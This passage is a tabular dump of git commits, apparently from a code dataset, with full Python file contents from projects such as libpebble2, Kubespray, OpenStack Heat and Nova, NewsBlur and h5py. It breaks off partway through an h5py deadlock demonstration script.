commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
96451643294003992e6d73ec34876badae177ed8 | Add PULSE support | pebble/libpebble2 | libpebble2/communication/transports/pulse.py | libpebble2/communication/transports/pulse.py | from __future__ import absolute_import
__author__ = 'Liam McLoughlin'
import struct
try:
import pulse2
except ImportError:
pass
from . import BaseTransport, MessageTargetWatch
from libpebble2.exceptions import ConnectionError, PebbleError
class PULSETransport(BaseTransport):
"""
Represents a direct connection to a physical/virtual Pebble uses the PULSEv2 interface.
This transport expects to be given a PULSE2 Link object.
:param connection: A PULSE2 Interface object to tunnel Pebble Protocol over.
:type link: pulse2.link.Interface
"""
must_initialise = True
PPOPULSE_PORT = 0x3e22
OPCODE_PROTOCOL_DATA = 0x1
OPCODE_CONNECT = 0x2
OPCODE_DISCONNECT = 0x3
def __init__(self, link):
self.link = link
self.connection = None
self.buffer = b''
try:
import pulse2
except ImportError:
raise PebbleError('pulse2 package not installed: it is required for PULSE transport')
@staticmethod
def _opcode(opcode):
return struct.pack('B', opcode)
@staticmethod
def _chunks(list_items, chunk_length):
for i in xrange(0, len(list_items), chunk_length):
yield list_items[i:i+chunk_length]
def connect(self):
self.connection = self.link.open_socket('reliable', self.PPOPULSE_PORT)
if not self.connection:
raise ConnectionError('Failed to open PPoPULSE socket')
self._send_with_opcode(self.OPCODE_CONNECT)
def disconnect(self):
if self.connected:
try:
self._send_with_opcode(self.OPCODE_DISCONNECT)
except pulse2.exceptions.SocketClosed:
pass
self.connection.close()
self.connection = None
@property
def connected(self):
return self.connection is not None
def read_packet(self):
while self.connected:
if len(self.buffer) >= 2:
length, = struct.unpack('!H', self.buffer[:2])
length += 4
if len(self.buffer) >= length:
msg_data = self.buffer[:length]
self.buffer = self.buffer[length:]
return MessageTargetWatch(), msg_data
try:
packet = self.connection.receive(block=True)
except (AttributeError, pulse2.exceptions.SocketClosed):
self.connection = None
raise ConnectionError('PULSE transport closed')
assert packet[0] == self._opcode(self.OPCODE_PROTOCOL_DATA)
self.buffer += packet[1:]
def send_packet(self, message, target=MessageTargetWatch()):
assert isinstance(target, MessageTargetWatch)
for chunk in self._chunks(message, self.connection.mtu - 1):
self._send_with_opcode(self.OPCODE_PROTOCOL_DATA, chunk)
def _send_with_opcode(self, opcode, body=None):
assert self.connected
data = self._opcode(opcode)
if body:
data += body
self.connection.send(data)
| mit | Python |
|
4fd03b93f7c2ff31b6a7ab6bf6d404cc579a6bf8 | Rewrite download_hash in Python (#5995) | kubernetes-incubator/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,kubernetes-incubator/kubespray,kubernetes-incubator/kargo,kubernetes-sigs/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,Atoms/kubespray,kubernetes-incubator/kargo | scripts/download_hash.py | scripts/download_hash.py | #!/usr/bin/env python3
# After a new version of Kubernetes has been released,
# run this script to update roles/download/defaults/main.yml
# with new hashes.
import hashlib
import sys
import requests
from ruamel.yaml import YAML
MAIN_YML = "../roles/download/defaults/main.yml"
def open_main_yaml():
yaml = YAML()
yaml.explicit_start = True
yaml.preserve_quotes = True
yaml.width = 4096
with open(MAIN_YML, "r") as main_yml:
data = yaml.load(main_yml)
return data, yaml
def download_hash(versions):
architectures = ["arm", "arm64", "amd64"]
downloads = ["kubelet", "kubectl", "kubeadm"]
data, yaml = open_main_yaml()
for download in downloads:
checksum_name = f"{download}_checksums"
for arch in architectures:
for version in versions:
if not version.startswith("v"):
version = f"v{version}"
url = f"https://storage.googleapis.com/kubernetes-release/release/{version}/bin/linux/{arch}/{download}"
download_file = requests.get(url, allow_redirects=True)
download_file.raise_for_status()
sha256sum = hashlib.sha256(download_file.content).hexdigest()
data[checksum_name][arch][version] = sha256sum
with open(MAIN_YML, "w") as main_yml:
yaml.dump(data, main_yml)
print(f"\n\nUpdated {MAIN_YML}\n")
def usage():
print(f"USAGE:\n {sys.argv[0]} [k8s_version1] [[k8s_version2]....[k8s_versionN]]")
def main(argv=None):
if not argv:
argv = sys.argv[1:]
if not argv:
usage()
sys.exit(1)
download_hash(argv)
if __name__ == "__main__":
sys.exit(main())
| apache-2.0 | Python |
|
3b27b1d6b1c4739b8d456703542ec8182ce12277 | Add a Wordpress+MySQL composed instance functional test case | gonzolino/heat,noironetworks/heat,steveb/heat,cwolferh/heat-scratch,noironetworks/heat,gonzolino/heat,maestro-hybrid-cloud/heat,citrix-openstack-build/heat,pshchelo/heat,cryptickp/heat,dragorosson/heat,rh-s/heat,Triv90/Heat,steveb/heat,rh-s/heat,srznew/heat,srznew/heat,openstack/heat,redhat-openstack/heat,rickerc/heat_audit,jasondunsmore/heat,maestro-hybrid-cloud/heat,redhat-openstack/heat,pratikmallya/heat,rdo-management/heat,varunarya10/heat,pshchelo/heat,citrix-openstack-build/heat,rdo-management/heat,Triv90/Heat,dims/heat,takeshineshiro/heat,miguelgrinberg/heat,Triv90/Heat,rickerc/heat_audit,JioCloud/heat,miguelgrinberg/heat,NeCTAR-RC/heat,dragorosson/heat,ntt-sic/heat,cwolferh/heat-scratch,JioCloud/heat,openstack/heat,NeCTAR-RC/heat,dims/heat,jasondunsmore/heat,takeshineshiro/heat,cryptickp/heat,pratikmallya/heat,varunarya10/heat,ntt-sic/heat | heat/tests/functional/test_WordPress_Composed_Instances.py | heat/tests/functional/test_WordPress_Composed_Instances.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import verify
import nose
from nose.plugins.attrib import attr
import unittest
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'composed', 'WordPressComposedInstances'])
class WordPressComposedInstancesFunctionalTest(unittest.TestCase):
def setUp(self):
template = 'WordPress_Composed_Instances.template'
self.func_utils = util.FuncUtils()
self.func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
self.func_utils.create_stack(template, 'F17')
self.func_utils.check_cfntools()
self.func_utils.wait_for_provisioning()
self.func_utils.check_user_data(template)
self.ssh = self.func_utils.get_ssh_client()
def test_instance(self):
# ensure wordpress was installed by checking for expected
# configuration file over ssh
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = self.ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# Verify the output URL parses as expected, ie check that
# the wordpress installation is operational
stack_url = self.func_utils.get_stack_output("WebsiteURL")
print "Got stack output WebsiteURL=%s, verifying" % stack_url
ver = verify.VerifyStack()
assert True == ver.verify_wordpress(stack_url)
self.func_utils.cleanup()
| apache-2.0 | Python |
|
1172287e38f623994b039cea0dab36ea68d18471 | add RabbitService | lielongxingkong/ics_demo,lielongxingkong/ics_demo | ics_demo/remote_services/demo.py | ics_demo/remote_services/demo.py | from base import Service
from ics_demo.helpers.base import uuidgen
class RabbitService(Service):
def it_is_my_warren(self, name):
cmd = 'mkdir -p /tmp/%s' % name
self.remote_cmd_quiet(cmd)
def put_carrot_bucket_in_my_warren(self, rabbit):
cmd = 'mkdir /tmp/%s/carrots' % rabbit.name
self.remote_cmd_quiet(cmd)
def put_a_carrot(self, rabbit):
cmd = 'touch /tmp/%s/carrots/%s' % (rabbit.name, uuidgen())
self.remote_cmd_quiet(cmd)
def my_carrots(self, rabbit):
cmd = 'ls /tmp/%s/carrots/' % rabbit.name
return self.remote_cmd_list(cmd)
| mit | Python |
|
8de10ac1bf133c41cc1d0e330714e1659e42b092 | add script to write consul-manager ip to a text file | samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur | consul/get_consul_manager_ip.py | consul/get_consul_manager_ip.py |
import os
import digitalocean
TOKEN_FILE = "/srv/secrets-newsblur/keys/digital_ocean.token"
with open(TOKEN_FILE) as f:
token = f.read().strip()
os.environ['DO_API_TOKEN'] = token
manager = digitalocean.Manager(token=token)
my_droplets = manager.get_all_droplets()
consul_manager_droplet = [d for d in my_droplets if d.name == "consul-manager"][0]
consul_manager_ip_address = consul_manager_droplet.ip_address
# write or overwrite the consul-manager ip
if "consul_manager_ip.txt" not in os.listdir('ansible'):
with open('consul_manager_ip.txt', 'w') as f:
f.write(consul_manager_ip_address) | mit | Python |
|
32f4055b52c8768c80cf82451f6ace74af600d0c | test new analyze rewrite | alexis-roche/nipy,alexis-roche/nireg,alexis-roche/register,alexis-roche/nipy,arokem/nipy,arokem/nipy,nipy/nireg,nipy/nipy-labs,bthirion/nipy,alexis-roche/register,bthirion/nipy,alexis-roche/niseg,bthirion/nipy,alexis-roche/nipy,alexis-roche/nipy,nipy/nireg,alexis-roche/register,arokem/nipy,bthirion/nipy,nipy/nipy-labs,alexis-roche/niseg,alexis-roche/nireg,arokem/nipy | lib/neuroimaging/refactoring/tests/test_analyze.py | lib/neuroimaging/refactoring/tests/test_analyze.py | import unittest
from neuroimaging.refactoring.analyze import AnalyzeImage
from neuroimaging.tests.data import repository
from neuroimaging.visualization.arrayview import arrayview
class AnalyzeImageTest(unittest.TestCase):
def setUp(self):
self.image = AnalyzeImage("rho", datasource=repository)
def test_header(self):
self.image.raw_array
def test_arrayview(self):
arrayview(self.image.raw_array)
if __name__ == '__main__': unittest.main()
| bsd-3-clause | Python |
|
6feae8e14b4e690cb0d5c71880b9d6c167ac978b | add stub for a csv scraping script | texastribune/ipeds_reporter | ipeds_reporter/scripts/scrape.py | ipeds_reporter/scripts/scrape.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
WIP thing to scrape ipeds for me.
"""
from selenium import webdriver
def main():
driver = webdriver.Firefox()
driver.close()
if __name__ == '__main__':
main()
| apache-2.0 | Python |
|
4241d67149887f8edc0636f7cb4fdbcb22e8e98b | Create repeatings.py | vladshults/python_modules,vladshults/python_modules | job_interview_algs/repeatings.py | job_interview_algs/repeatings.py | TEXT = """abba com mother bill mother com
abba dog abba mother com"""
def secuenced_words(txt):
"""
Function identifies and displays the three words
most often repeated as a group, regardless of the
words order in the group
"""
word_list = txt.split()
collector = dict()
for idx in range(1, len(word_list)-1):
item = frozenset([word_list[idx-1], word_list[idx], word_list[idx+1]])
if item not in collector:
collector[item] = 1
else:
collector[item] += 1
return list(sorted(collector)[0])
if __name__ == "__main__":
print(secuenced_words(TEXT))
| mit | Python |
|
3bd95d8789871246fb90c6eb0487d9746ef5cb27 | Migrate all project contents blocks to activity contents blocks | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/cms/migrations/0056_auto_20191106_1041.py | bluebottle/cms/migrations/0056_auto_20191106_1041.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-06 09:41
from __future__ import unicode_literals
from django.db import migrations
def migrate_project_blocks(apps, schema_editor):
ProjectsContent = apps.get_model('cms', 'ProjectsContent')
ActivitiesContent = apps.get_model('cms', 'ActivitiesContent')
Initiative = apps.get_model('initiatives', 'Initiative')
ContentType = apps.get_model('contenttypes', 'ContentType')
activity_content_ctype = ContentType.objects.get_for_model(ActivitiesContent)
for projects_content in ProjectsContent.objects.all():
activities_content = ActivitiesContent.objects.create(
title=projects_content.title,
sub_title=projects_content.sub_title,
sort_order=projects_content.sort_order,
placeholder=projects_content.placeholder,
parent_id=projects_content.parent_id,
language_code=projects_content.language_code,
polymorphic_ctype_id=activity_content_ctype.pk,
parent_type_id=projects_content.parent_type_id,
highlighted=projects_content.from_homepage
)
for project in projects_content.projects.all():
initiative = Initiative.objects.get(slug=project.slug)
for activity in initiative.activities.all():
activities_content.activities.add(activity)
activities_content.save()
projects_content.delete()
class Migration(migrations.Migration):
dependencies = [
('cms', '0055_migrate_statistics'),
]
operations = [
migrations.RunPython(migrate_project_blocks)
]
| bsd-3-clause | Python |
|
06570a926bde2ea10730062b05a2348c3020745c | Add example: filtered ensemble average. | cfe316/atomic,ezekial4/atomic_neu,ezekial4/atomic_neu | examples/filter_ensemble_average.py | examples/filter_ensemble_average.py | import numpy as np
import matplotlib.pyplot as plt
import atomic
from ensemble_average import time_dependent_power
if __name__ == '__main__':
times = np.logspace(-7, 0, 50)
temperature = np.logspace(0, 3, 50)
density = 1e19
from atomic.pec import TransitionPool
ad = atomic.element('argon')
tp = TransitionPool.from_adf15('adas_data/pec/*ar*.dat')
ad = tp.filter_energy(2e3, 20e3, 'eV').create_atomic_data(ad)
rt = atomic.RateEquations(ad)
y = rt.solve(times, temperature, density)
taus = np.array([ 1e14, 1e15, 1e16, 1e17, 1e18])/density
plt.figure(1); plt.clf()
from filter_construction import plot_coeffs
plot_coeffs(ad, temperature, 5)
plt.ylim(1e-35, 1e-30)
plt.draw()
plt.figure(2); plt.clf()
time_dependent_power(y, taus)
plt.draw()
plt.figure(3); plt.clf()
time_dependent_power(y, taus, ensemble_average=True)
plt.draw()
plt.show()
| mit | Python |
|
d9985ec4fa37cf99e0e541c7affadd5ec9288a0c | Create multithread.py | run-dong-zhu/Algorithms,run-dong-zhu/Algorithms,run-dong-zhu/Algorithms,run-dong-zhu/Algorithms | APIs/multithread.py | APIs/multithread.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 22:59:02 2018
@author: zhurundong
"""
import time
import requests
import asyncio
import aiohttp
from concurrent.futures import ThreadPoolExecutor
NUMBERS = range(12)
URL = 'http://httpbin.org/get?a={}'
# Get http requests results
def fetch(a):
r = requests.get(URL.format(a))
return r.json()['args']['a']
start = time.time()
for num in NUMBERS:
result = fetch(num)
print('fetch({}) = {}'.format(num, result))
print('cost time: {}'.format(time.time() - start))
# Get http requests results
def fetch(a):
r = requests.get(URL.format(a))
return r.json()['args']['a']
start = time.time()
# Using ThreadPool
with ThreadPoolExecutor(max_workers = 5) as executor:
for num, result in zip(NUMBERS, executor.map(fetch, NUMBERS)):
print('fetch({}) = {}'.format(num, result))
print('cost time: {}'.format(time.time() - start))
| epl-1.0 | Python |
|
93f6ebde39ef0538624ad3eb94316bf8bdf69fd9 | Create N_QueensII.py | UmassJin/Leetcode | Array/N_QueensII.py | Array/N_QueensII.py | Follow up for N-Queens problem.
Now, instead outputting board configurations, return the total number of distinct solutions.
class Solution:
# @param {integer} n
# @return {integer}
def totalNQueens(self, n):
if n == 0: return 0
self.result = 0 # Here we should use the global variable, otherwise the result will not change
checklist = [-1 for i in xrange(n)]
self.queen_helper(n, 0, checklist)
return self.result
def check_helper(self, depth, i, checklist):
for k in xrange(depth):
if checklist[k] == i or abs(checklist[k] - i) == abs(depth-k):
return False
return True
def queen_helper(self, n, depth, checklist):
if depth == n:
self.result += 1; return
for i in xrange(n):
if self.check_helper(depth, i, checklist):
checklist[depth] = i
self.queen_helper(n, depth+1, checklist)
| mit | Python |
|
38b4ec7164f07af7135c41c401c4f403c1061d66 | Add skeleton for parsing commands | Zillolo/lazy-todo | app/main.py | app/main.py | """lazy
Usage:
lazy (new|n)
lazy (show|s) [<id>]
lazy (delete|d) [<id>]
lazy (import|i) <path>
lazy (export|e) <path> [<id>]
Options:
-h, --help: Show this help message.
"""
from docopt import docopt
def main():
# Parse commandline arguments.
args = docopt(__doc__)
if args['new'] or args['n']:
# Insert a new task.
pass
elif args['show'] or args['s']:
if args['<id>']:
# Show the task whose ID most closely matches the given ID.
pass
else:
# Show all tasks for the current user.
pass
elif args['delete'] or args['d']:
if args['<id>']:
# Delete the task with the ID that most closely matches the given
# ID.
pass
else:
# Prompt the user to input the ID of the task to delete.
# Then delete the task with the ID that matches the given one best.
pass
elif args['import'] or args['i']:
# Check if the given path exists and if so, import from it.
pass
elif args['export'] or args['e']:
# Check if it is possible to write to the given path.
if args['<id>']:
# Write only the task with the ID that matches the given one best.
pass
else:
# Write all tasks the current user has to the file.
pass
| mit | Python |
|
b0f4a0abb74bc9f1cf97a49d4501c48d666b6dfe | add qt3 | tuttleofx/sconsProject | autoconf/qt3.py | autoconf/qt3.py | from _external import *
import os
def unique(list):
return dict.fromkeys(list).keys()
def subdirs(files):
dirs = unique(map(os.path.dirname, files))
dirs.sort()
return dirs
def locateQt3Command(env, command, bindir):
#print 'locateQt3Command:', command
suffixes = [
'-qt3',
'3',
'',
]
progs = [command+s for s in suffixes]
for prog in progs:
path = env.WhereIs(prog, path=bindir)
if path:
return path
msg = 'Qt3 command "' + command + '" not found. Tried: ' + str(progs) + '.'
#raise Exception(msg)
print 'Warning: ', msg
return command
class Qt3Checker(LibWithHeaderChecker):
'''
Qt3 checker
'''
def __init__( self,
modules = [
'qt',
'qui',
],
uiFiles = [],
defines = ['QT_NO_KEYWORDS'],
useLocalIncludes = True ):
self.name = 'qt3'
self.libs = modules
self.uiFiles = uiFiles
self.defines = defines
self.useLocalIncludes = useLocalIncludes
def setModules(self, modules):
self.libs = modules
def declareUiFiles(self, uiFiles):
self.uiFiles = uiFiles
def initOptions(self, project, opts):
LibWithHeaderChecker.initOptions(self, project, opts)
opts.Add( 'bindir_'+self.name, 'Base directory for '+self.name, os.path.join('$dir_'+self.name, 'bin') )
return True
def configure(self, project, env):
env.EnableQtEmmitters()
bindir = '$bindir_'+self.name
moc = locateQt3Command(env, 'moc', bindir)
uic = locateQt3Command(env, 'uic', bindir)
rcc = locateQt3Command(env, 'rcc', bindir)
lupdate = locateQt3Command(env, 'lupdate', bindir)
lrelease = locateQt3Command(env, 'lrelease', bindir)
#print 'moc', moc
env.SetDefault(
QT_MOC = moc,
QT_UIC = uic,
QT_RCC = rcc,
QT_LUPDATE = lupdate,
QT_LRELEASE = lrelease,
)
# depends the developper syntax used
# maybe we need to expose these values as parameters (in initOptions)
env.Replace(
QT_UICDECLPREFIX = '', # this is the standard value for qt3
QT_UICDECLSUFFIX = '.h',
)
return BaseLibChecker.configure(self, project, env)
def check(self, project, conf):
conf.env.AppendUnique( CPPDEFINES = self.defines )
result = self.CheckLibWithHeader( conf, self.libs, header=['qapplication.h'], language='c++' )
return result
def postconfigure(self, project, env):
'''
Cas particulier. Permet d'ajouter des elements a l'environnement apres les checks de toutes les libs.
'''
if len(self.uiFiles):
uis = [env.Uic( ui ) for ui in self.uiFiles]
if self.useLocalIncludes:
env.AppendUnique( CPPPATH=subdirs(self.uiFiles) )
return True
qt3 = Qt3Checker
| mit | Python |
|
3ed9dd0ca03216311771cda5f9cd3eb954a14d4f | Add boilerplate with simple test sounds | Parisson/Telemeta,Parisson/Telemeta,ANR-kamoulox/Telemeta,ANR-kamoulox/Telemeta,Parisson/Telemeta,ANR-kamoulox/Telemeta,ANR-kamoulox/Telemeta,Parisson/Telemeta | telemeta/management/commands/telemeta-test-boilerplate.py | telemeta/management/commands/telemeta-test-boilerplate.py | from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
import os
from telemeta.models import *
from timeside.core.tools.test_samples import generateSamples
class Command(BaseCommand):
help = "Setup and run a boilerplate for testing"
code = 'Tests'
def handle(self, *args, **options):
# NOT for production
# self.processor_cleanup()
# self.result_cleanup()
media_dir = 'items' + os.sep + 'tests'
samples_dir = settings.MEDIA_ROOT + media_dir
samples = generateSamples(samples_dir=samples_dir)
collection, c = MediaCollection.objects.get_or_create(title=self.code,
code=self.code)
for sample in samples.iteritems():
filename, path = sample
title = os.path.splitext(filename)[0]
path = media_dir + os.sep + filename
item, c = MediaItem.objects.get_or_create(title=title,
code=self.code + '-' + slugify(filename),
file=path, collection=collection)
| agpl-3.0 | Python |
|
eeea573c3ecf6aa2baacdda61c0f9a248a28780f | add missing migration | DemocracyClub/yournextrepresentative,DemocracyClub/yournextrepresentative,DemocracyClub/yournextrepresentative | ynr/apps/uk_results/migrations/0034_auto_20180130_1243.py | ynr/apps/uk_results/migrations/0034_auto_20180130_1243.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-01-30 12:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('uk_results', '0033_auto_20170506_2042'),
]
operations = [
migrations.AlterModelOptions(
name='postelectionresult',
options={'get_latest_by': 'confirmed_resultset__created'},
),
migrations.AlterField(
model_name='councilelectionresultset',
name='review_status',
field=models.CharField(blank=True, choices=[(None, b'Unreviewed'), (b'unconfirmed', b'Unconfirmed'), (b'confirmed', b'Confirmed'), (b'rejected', b'Rejected')], max_length=100),
),
migrations.AlterField(
model_name='postelectionresult',
name='confirmed',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='resultset',
name='review_status',
field=models.CharField(blank=True, choices=[(None, b'Unreviewed'), (b'unconfirmed', b'Unconfirmed'), (b'confirmed', b'Confirmed'), (b'rejected', b'Rejected')], max_length=100),
),
]
| agpl-3.0 | Python |
|
59f0a18b5232e866f84fdaf6688ced5a1b4a9c44 | Add fedora.tg.widgets module containing a few proof-of-concept Fedora TurboGears widgets | fedora-infra/python-fedora | fedora/tg/widgets.py | fedora/tg/widgets.py | # Proof-of-concept Fedora TurboGears widgets
# Authors: Luke Macken <lmacken@redhat.com>
import re
import urllib2
import feedparser
import simplejson
from bugzilla import Bugzilla
from turbogears.widgets import Widget
class FedoraPeopleWidget(Widget):
template = """
<table xmlns:py="http://purl.org/kid/ns#" border="0">
<tr py:for="entry in entries">
<td><img src="${entry['image']}" height="32" width="32"/></td>
<td><a href="${entry['link']}">${entry['title']}</a></td>
</tr>
</table>
"""
params = ["entries"]
def __init__(self):
self.entries = []
regex = re.compile('<img src="(.*)" alt="" />')
feed = feedparser.parse('http://planet.fedoraproject.org/rss20.xml')
for entry in feed['entries'][:5]:
self.entries.append({
'link' : entry['link'],
'title' : entry['title'],
'image' : regex.match(entry['summary']).group(1)
})
class FedoraMaintainerWidget(Widget):
template = """
<table xmlns:py="http://purl.org/kid/ns#" border="0">
<tr py:for="pkg in packages">
<td><a href="https://admin.fedoraproject.org/pkgdb/packages/name/${pkg['name']}">${pkg['name']}</a></td>
</tr>
</table>
"""
params = ["packages"]
def __init__(self, username):
page = urllib2.urlopen('https://admin.fedoraproject.org/pkgdb/users/packages/%s/?tg_format=json' % username)
self.packages = simplejson.load(page)['pkgs'][:5]
class BugzillaWidget(Widget):
template = """
<table xmlns:py="http://purl.org/kid/ns#" border="0">
<tr py:for="bug in bugs">
<td>
<a href="${bug.url}">${bug.bug_id}</a> ${bug.short_short_desc}
</td>
</tr>
</table>
"""
params = ["bugs"]
def __init__(self, email):
bz = Bugzilla(url='https://bugzilla.redhat.com/xmlrpc.cgi')
self.bugs = bz.query({
'product' : 'Fedora',
'email1' : email,
'emailassigned_to1' : True
})[:5]
| lgpl-2.1 | Python |
|
046922c6b842e5ba78fc44848ddf24e6434dd799 | Add related options to floating ip config options | vmturbo/nova,gooddata/openstack-nova,klmitch/nova,vmturbo/nova,gooddata/openstack-nova,rahulunair/nova,hanlind/nova,jianghuaw/nova,Juniper/nova,klmitch/nova,Juniper/nova,rajalokan/nova,mahak/nova,Juniper/nova,gooddata/openstack-nova,rajalokan/nova,rajalokan/nova,mahak/nova,Juniper/nova,jianghuaw/nova,openstack/nova,phenoxim/nova,openstack/nova,mikalstill/nova,rahulunair/nova,mikalstill/nova,rahulunair/nova,mikalstill/nova,vmturbo/nova,phenoxim/nova,vmturbo/nova,hanlind/nova,gooddata/openstack-nova,hanlind/nova,jianghuaw/nova,openstack/nova,klmitch/nova,jianghuaw/nova,klmitch/nova,mahak/nova,rajalokan/nova | nova/conf/floating_ips.py | nova/conf/floating_ips.py | # Copyright 2016 Huawei Technology corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
floating_ip_opts = [
cfg.StrOpt('default_floating_pool',
default='nova',
help="""
Default pool for floating IPs.
This option specifies the default floating IP pool for allocating floating IPs.
While allocating a floating ip, users can optionally pass in the name of the
pool they want to allocate from, otherwise it will be pulled from the
default pool.
If this option is not set, then 'nova' is used as default floating pool.
Possible values:
* Any string representing a floating IP pool name
"""),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help="""
Autoassigning floating IP to VM
When set to True, floating IP is auto allocated and associated
to the VM upon creation.
"""),
cfg.StrOpt('floating_ip_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for floating IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries associated with floating IPs.
When a user adds a DNS entry for a specified domain to a floating IP,
nova will add a DNS entry using the specified floating DNS driver.
When a floating IP is deallocated, its DNS entry will automatically be deleted.
Possible values:
* Full Python path to the class to be used
Related options:
* use_neutron: this options only works with nova-network.
"""),
cfg.StrOpt('instance_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for instance IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries for instances.
On instance creation, nova will add DNS entries for the instance name and
id, using the specified instance DNS driver and domain. On instance deletion,
nova will remove the DNS entries.
Possible values:
* Full Python path to the class to be used
Related options:
* use_neutron: this options only works with nova-network.
"""),
cfg.StrOpt('instance_dns_domain',
default='',
help="""
If specified, Nova checks if the availability_zone of every instance matches
what the database says the availability_zone should be for the specified
dns_domain.
Related options:
* use_neutron: this options only works with nova-network.
""")
]
def register_opts(conf):
conf.register_opts(floating_ip_opts)
def list_opts():
return {'DEFAULT': floating_ip_opts}
| # needs:fix_opt_description
# Copyright 2016 Huawei Technology corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
# TODO(johngarbutt) all of these opitions only work with nova-network.
# We need to find a good way to document that.
floating_ip_opts = [
cfg.StrOpt('default_floating_pool',
default='nova',
help="""
Default pool for floating IPs.
This option specifies the default floating IP pool for allocating floating IPs.
While allocating a floating ip, users can optionally pass in the name of the
pool they want to allocate from, otherwise it will be pulled from the
default pool.
If this option is not set, then 'nova' is used as default floating pool.
Possible values:
* Any string representing a floating IP pool name
"""),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help="""
Autoassigning floating IP to VM
When set to True, floating IP is auto allocated and associated
to the VM upon creation.
"""),
cfg.StrOpt('floating_ip_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for floating IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries associated with floating IPs.
When a user adds a DNS entry for a specified domain to a floating IP,
nova will add a DNS entry using the specified floating DNS driver.
When a floating IP is deallocated, its DNS entry will automatically be deleted.
Possible values:
* Full Python path to the class to be used
"""),
cfg.StrOpt('instance_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for instance IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries for instances.
On instance creation, nova will add DNS entries for the instance name and
id, using the specified instance DNS driver and domain. On instance deletion,
nova will remove the DNS entries.
Possible values:
* Full Python path to the class to be used
"""),
# TODO(aunnam): remove default
cfg.StrOpt('instance_dns_domain',
default='',
help="""
If specified, Nova checks if the availability_zone of every instance matches
what the database says the availability_zone should be for the specified
dns_domain.
""")
]
def register_opts(conf):
conf.register_opts(floating_ip_opts)
def list_opts():
return {'DEFAULT': floating_ip_opts}
| apache-2.0 | Python |
efee783cb87fe2015ab719699e80a661aa3b4d4b | Create main.py | cmcguinness/focusstack | main.py | main.py | import os
import cv2
import FocusStack
"""
Focus stack driver program
This program looks for a series of files of type .jpg, .jpeg, or .png
in a subdirectory "input" and then merges them together using the
FocusStack module. The output is put in the file merged.png
Author: Charles McGuinness (charles@mcguinness.us)
Copyright: Copyright 2015 Charles McGuinness
License: Apache License 2.0
"""
def stackHDRs(image_files):
focusimages = []
for img in image_files:
print "Reading in file {}".format(img)
focusimages.append(cv2.imread("input/{}".format(img)))
merged = FocusStack.focus_stack(focusimages)
cv2.imwrite("merged.png", merged)
if __name__ == "__main__":
image_files = sorted(os.listdir("input"))
for img in image_files:
if img.split(".")[-1].lower() not in ["jpg", "jpeg", "png"]:
image_files.remove(img)
stackHDRs(image_files)
print "That's All Folks!"
| apache-2.0 | Python |
|
3e0ababfeb0e22d33853d4bad68a29a0249e1a60 | Add script demonstrating thread deadlock | h5py/h5py,h5py/h5py,h5py/h5py | other/iterate_deadlock.py | other/iterate_deadlock.py |
"""
Demonstrates deadlock related to attribute iteration.
"""
from threading import Thread
import h5py
FNAME = "deadlock.hdf5"
def make_file():
with h5py.File(FNAME,'w') as f:
